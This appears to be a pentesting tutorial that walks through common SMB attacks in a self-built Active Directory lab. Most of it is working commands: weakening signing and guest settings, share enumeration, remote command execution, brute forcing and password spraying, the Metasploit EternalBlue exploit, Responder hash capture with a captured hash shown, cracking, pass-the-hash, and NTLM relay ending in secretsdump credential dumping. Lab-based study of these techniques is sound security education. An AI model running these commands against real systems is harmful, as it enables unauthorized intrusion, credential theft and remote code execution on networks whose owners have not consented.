SMB Common Attacks
Sections
SMB Intro
Making the Lab vulnerable
SMB Tools & Guest or Anonymous access to Shares
RCE Via access to Administrative Shares
SMB Brute Forcing
SMB Password Spraying
SMBv1 EternalBlue (CVE-2017-0144)
Net-NTLM Capture Attack
Pass the Hash Attack (PTH)
Net-NTLM Relay Attack
Other Resources
SMB Intro
The SMB protocol is a network file sharing protocol that allows applications on a computer to read and write to files. SMB also requests services from server programs in a computer network. It's the most critical attack vector if it's not protected well.
The v1 is deprecated and have several vulnerabilities (Eternal Blue, WannaCry, etc).
It can run over multiple ports: 445, 137-139 (NetBIOS), and over UDP.
Making the Lab vulnerable
Create a Share
To test it, i've created a share folder called "SharedFiles" with a text file. This directory is shared with 'devan' with read/write rights (Properties->Share->AddUser: 'devan')

Location: \\CORP-DC\SharedFiles
Then, we can access to it on Devan's workstation machine using that location

Disable SMB Signing
By default, SMB signing is enabled on Domain Controllers.
Method 1: Group Policy (Recommended)
Open Group Policy Editor (
gpedit.msc
).Navigate to:
Computer Configuration → Windows Settings → Security Settings → Local Policies → Security Options
Set the following to Disabled:
"Microsoft network server: Digitally sign communications (always)"
"Microsoft network server: Digitally sign communications (if client agrees)"
Restart the server.
Method 2: Registry (Manual)
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "RequireSecuritySignature" -Value 0
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "EnableSecuritySignature" -Value 0
Restart-Computer -Force
Enable Guest & Anonymous Access
Method 1: Group Policy (Recommended)
Open Group Policy Editor (
gpedit.msc
).Navigate to:
Computer Configuration → Administrative Templates → Network → Lanman Workstation
Enable "Enable insecure guest logons".
Then, go to:
Computer Configuration → Windows Settings → Security Settings → Local Policies → Security Options
Set the following to Enabled:
"Network access: Let Everyone permissions apply to anonymous users"
"Accounts: Guest account status"
Restart the server.
Method 2: Registry (Manual)
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "RestrictAnonymous" -Value 0
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" -Name "AllowInsecureGuestAuth" -Value 1
Restart-Computer -Force
Allow Anonymous Access to a Specific SMB Share
Method 1: Security Policy (secpol.msc
)
Open Local Security Policy (
secpol.msc
).Navigate to:
Security Settings → Local Policies → Security Options
Modify "Network access: Shares that can be accessed anonymously" and add "SharedFiles".
Restart the server.
Method 2: Registry (Manual)
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "NullSessionShares" -Value "SharedFiles"
Restart-Computer -Force
SMB Tools & Guest or Anonymous access to Shares
SMBMap
We can enumerate SMB shares and access to system using these command:
smbmap -H corp-dc #List share with anonymous access
smbmap -H corp-dc -u "devan" -p "P@ssword123!" #List Devan's shares
smbmap -H corp-dc -u "devan" --prompt ##List Devan's shares without writing password in cleartext

List a specific Share
smbmap -H corp-dc -u "devan" --prompt -r "SharedFiles"
Check OS Version and signing status
smbmap -H corp-dc -u "devan" --prompt -v #OS version check
smbmap -H corp-dc -u "devan" --prompt --signing #Signing check

If the signing of message is disabled we can use it for Relay attacks and potentially of exploit eternalblue vuln.
SMB Client
Similar to SMBMap, we can use it to enumerate shares and interact with file system prompt
smbclient -L //corp-dc -N #Anonymous Login (-N no credentials)
smbclient //corp-dc -U "dev-angelist.lab/devan%P@ssword123!" #List Devan's shares
smbclient //corp-dc/SharedFiles -U devan
smbclient //corp-dc/SharedFiles -U "dev-angelist.lab/devan%P@ssword123!" #we can get file shared using get command
#File system prompt includes command such as: cd, dir, ls, get, put

Netexec
It's a fantastic tool useful for more common protocols
nxc smb corp-dc #Retrieve info about DC, SMB vs, OS vs, domain name and signing status
nxc smb corp-dc -u "" -p "" --users #Try to authenticate using Null session
nxc smb corp-dc -u "AnAccountThatDoesntExist" --shares #Try to authenticate using guest account
nxc smb corp-dc -u "devan" -p "P@ssword123!" --shares #List Devan's shares and info about DC, SMB vs, OS vs, domain name and signing status

RCE Via access to Administrative Shares
If it's possible to access administrative shares of SMB, it might be possible to obtain Remote Code Execution (RCE)
smbmap -H corp-dc -u "administrator" -x "whoami" --prompt
smbmap -H corp-dc -u "administrator" -x "whoami /priv" --prompt
nxc smb corp-dc -u "administrator" -p 'P@$$W0rd' -x "whoami /priv"

In this case we've execute only a whoami command, but for example we can use it for spawn a reverse shell
SMB Brute Forcing
When we're talking about login, we must talk about brute force attack. To perform this we can use tools such as Hydra or Legba (suggested for SMB protocol and running with docker)
docker run --entrypoint "/bin/bash" -v $(pwd)/wordlists:/data --network host -it evilsocket/legba:latest #Get shell within docker
legba smb --smb-workgroup dev-angelist.lab --smb-share "C$" --username administrator --password ./passwords.txt --target corp-dc #Bruteforce administrator password
legba smb --smb-workgroup dev-angelist.lab --smb-share "SharedFiles" --username devan --password ./passwords.txt --target corp-dc #Bruteforce Devan's password
SMB Password Spraying
A password spraying attack involve a threat actor using a single common password against multiple accounts on the same application, because passwords are common and many times multiple users can use the same password.
We can perform it utilizing Netexec
nxc smb corp-dc -u "devan" -p passwords.txt #Basic nxc query - we can use rockyou.txt
nxc smb ip.txt -u users.txt -p passwords.txt --continue-on-success #password spraying on multiple IPs and users
SMBv1 EternalBlue (CVE-2017-0144)
Windows system that running SMBv1, can be vulnerable to dangerous attacks, such as EternalBlue', also known as
CVE-2017-0144' or `MS-17-010'.
We can enumerate multiple configuration checking the smb version using previous tools (smbap, netexc) or though 'generic tools' such as: nmap and metasploit framework:
Nmap
nmap -p445 --script smb-vuln-ms17-010 corp-dc #Enumerate vulnerable configuration
Metasploit
# Scan for vulnerabilty
msfconsole -q
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS corp-dc
run
# Exploit vulnerability
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS corp-dc
run
Other Lab
Net-NTLM Capture Attack
When a Windows client authenticates to an SMB server, the NTLM hash of the client is sent to the server for authentication. Depending on the protocol version, it is transmitted differently:
Net-NTLMv1:
Uses a simple DES encryption scheme based on the NT hash.
Net-NTLMv2:
Uses HMAC-MD5 and a combination of server/client challenges for stronger security.
It is possible to capture a user's Net-NTLM hash by forcing the client to authenticate against a fake SMB server.
Common attack vectors are:
Phishing real users
Exploiting a reverse shell
To set up Responder for capturing Net-NTLM hashes:
Install Responder:
python3 -m venv venv source venv/bin/activate pip3 install impacket netifaces git clone https://github.com/lgandx/Responder.git
Start Responder on the victim's network interface (kali):
cd Responder sudo python3 Responder.py -I eth1

Trigger authentication from the victim machine:
C:\> dir \\192.168.57.7\test
#Access is denied.

This will leak the Net-NTLM hash:
[SMB] NTLMv2-SSP Client : 192.168.57.9
[SMB] NTLMv2-SSP Username : DEV-ANGELIST\Administrator
[SMB] NTLMv2-SSP Hash : Administrator::DEV-ANGELIST:835fd92467bf9924:402A6AD80187AB11FB4365555DFD8EB3:01010000000000008050C8D5E186DB019D1CCCC0C96282C30000000002000800510051005A00370001001E00570049004E002D0039004D00560044005200430035004F0048003500460004003400570049004E002D0039004D00560044005200430035004F004800350046002E00510051005A0037002E004C004F00430041004C0003001400510051005A0037002E004C004F00430041004C0005001400510051005A0037002E004C004F00430041004C00070008008050C8D5E186DB01060004000200000008003000300000000000000000000000003000002A5FFAB95CA90DF53DDD925A77ABF2D821EC425793DF5EA240819ACB70830A4E0A001000000000000000000000000000000000000900220063006900660073002F003100390032002E003100360038002E00350037002E0037000000000000000000
Cracking the captured Net-NTLM hash (tools: JohnTheRipper or Hashcat):
# Net-NTLMv1 john --format=netntlm --wordlist=rockyou.txt hash.txt hashcat -m 5500 hash.txt rockyou.txt # Net-NTLMv2 john --format=netntlmv2 --wordlist=rockyou.txt hash.txt hashcat -m 5600 hash.txt rockyou.txt

Pass the Hash Attack (PTH)
If an attacker obtains an NTLM hash (the hash stored into memory, different than NetNTLM hash), it can be used to authenticate as the user without knowing the password.
We can obtain NTLM using tools such as Mimikatz.

Example NTLM Hash:
administrator:f193d757b4d487ab7e5a3743f038f713
Using nxc
(NetExec) to authenticate:
nxc smb corp-dc -u administrator -H f193d757b4d487ab7e5a3743f038f713
nxc smb corp-dc -u administrator -H f193d757b4d487ab7e5a3743f038f713 --shares
nxc smb corp-dc -u administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE -X "whoami"
If the user of the hash is unknown, we can spray it against a list of users:
nxc smb corp-dc -u users.txt -H 2B576ACBE6BCFDA7294D6BD18041B8FE
Net-NTLM Relay Attack
If the captured Net-NTLM hash cannot be cracked, it can be relayed to another system if SMB signing is disabled.
The NTLM relay attack has the following steps:
0) Check if SMB signing is disabled (pre-requisite)
1) Interception of Authentication Attempt
2) Capture of Net-NTLM Challenge-Reponse
3) Relay to Target SMB
4) Obtain Unauthorized Access
Check SMB signing status:
(on attacker machine)
nxc smb corp-dc #Retrieve info about DC, SMB vs, OS vs, domain name and signing status
smbmap -H corp-dc -u "devan" --prompt --signing #Signing check
nmap --script smb2-security-mode.nse -p 445 corp-dc #If the output is "Message signing not required" it's vulnerable
(on target):
Get-SmbServerConfiguration | Select EnableSMB1Protocol, EnableSMB2Protocol, RequireSecuritySignature
If signing is enabled, it must be disabled via GPO or PowerShell:
Set-SmbClientConfiguration -RequireSecuritySignature $false
Set-SmbServerConfiguration -RequireSecuritySignature $false
Obtain a list of vulnerable SMB servers:
nxc smb corp-dc --gen-relay-list target_list.txt

192.168.57.9
is the correspective IP of corp-dc
Start server to replay Net-NTLM Hash
sudo ntlmrelayx.py --no-http-server -smb2support -t smb://corp-dc -socks
Trigger authentication from the victim machine:
dir \\192.168.57.7\test #Kali Machine (192.168.57.7)
Setup Proxychains Proxy
sudo echo "socks4 127.0.0.1 1080" >> /etc/proxychains.conf
Using the authenticated session via SOCKS proxy:
proxychains lookupsid.py -no-pass -domain-sids domain/user@corp-dc
proxychains secretsdump.py -no-pass domain/user@corp-dc
proxychains smbexec.py -no-pass domain/user@corp-dc
Other Resources
Last updated